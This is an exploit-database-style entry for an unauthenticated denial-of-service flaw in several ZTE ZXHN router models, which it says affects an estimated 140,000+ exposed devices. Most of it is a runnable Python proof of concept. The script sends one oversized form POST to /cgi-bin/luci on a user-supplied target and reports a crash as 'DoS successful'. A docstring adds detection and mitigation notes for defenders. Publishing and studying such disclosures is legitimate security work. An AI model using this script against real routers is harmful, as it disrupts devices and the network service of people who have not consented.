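# Exploit Title: ZTE Routers - Unauthenticated Denial of Service
# Date: 2026-05-20
# Exploit Author: Mina Nageh Salalma (Monx Research)
# Vendor Homepage: https://www.zte.com.cn
# Software Link: https://github.com/minanagehsalalma/cve-2026-34473-unauthenticated-dos-zte-routers
# Version: Multiple ZTE router models (17+ confirmed)
# Tested on: Multiple ZTE ZXHN models; estimated 140,000+ publicly exposed devices
# CVE: CVE-2026-34473
# Description:
# The CGILua post.lua parser in 17+ ZTE router models does not enforce a
# maximum body size for application/x-www-form-urlencoded POST requests.
# An unauthenticated attacker can crash or freeze the router's web service
# by sending a single oversized POST request to any CGI endpoint.
# No authentication, session, or credentials are required.
#
# Affected: 17+ ZTE ZXHN router models deployed by ISPs worldwide.
# Estimated 140,000+ publicly reachable devices at time of research.
#
# MITRE CVE: https://www.cve.org/CVERecord?id=CVE-2026-34473

# PoC (Python 3)
import requests
import sys


def dos_exploit(target, size_kb=256):
    """
    CVE-2026-34473 - Unauthenticated DoS

    Sends one oversized application/x-www-form-urlencoded POST body to the
    router's CGI endpoint and reports, by exception type, whether the web
    service is still answering.

    Args:
        target: host or host:port of the device under test (plain HTTP).
        size_kb: size of the form value in KiB; the body is ``"a="``
            followed by that many KiB of ``"A"``.

    Returns:
        None. The outcome is only printed: ``[+]`` the device answered,
        ``[!]`` the connection dropped or timed out (what this PoC reports
        as a successful DoS), ``[-]`` any other error.

    Defender's note: the observable is a single unauthenticated POST to
    /cgi-bin/luci with Content-Type application/x-www-form-urlencoded and
    a body of roughly size_kb KiB, so an oversized urlencoded POST to the
    CGI path is what to alert on. The header above states the parser
    enforces no maximum body size; a body-size limit in front of the CGI
    parser, or not exposing the management interface to untrusted networks,
    is presumably what removes the precondition (confirm against the
    vendor advisory).
    """
    url = f"http://{target}/cgi-bin/luci"
    payload = "a=" + "A" * (size_kb * 1024)
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    try:
        r = requests.post(url, data=payload, headers=headers, timeout=15)
        print(f"[+] {target} responded with HTTP {r.status_code} (device may still be up)")
    except requests.exceptions.ConnectionError:
        print(f"[!] {target} - Connection refused or dropped: device web service likely crashed (DoS successful)")
    except requests.exceptions.Timeout:
        print(f"[!] {target} - Timeout: device web service unresponsive (DoS successful)")
    except Exception as e:
        # Catch-all at the script boundary: any other exception is
        # reported rather than traced.
        print(f"[-] {target}: {e}")


if __name__ == "__main__":
    # argv[1] is the target (required); argv[2] the payload size in KiB.
    # The original usage line omitted the required target argument.
    if len(sys.argv) < 2:
        print("Usage: poc.py <target> [payload_size_kb]")
        sys.exit(1)
    try:
        size = int(sys.argv[2]) if len(sys.argv) > 2 else 256
    except ValueError:
        # A non-numeric size previously surfaced as an uncaught traceback.
        print("payload_size_kb must be an integer")
        sys.exit(1)
    dos_exploit(sys.argv[1], size)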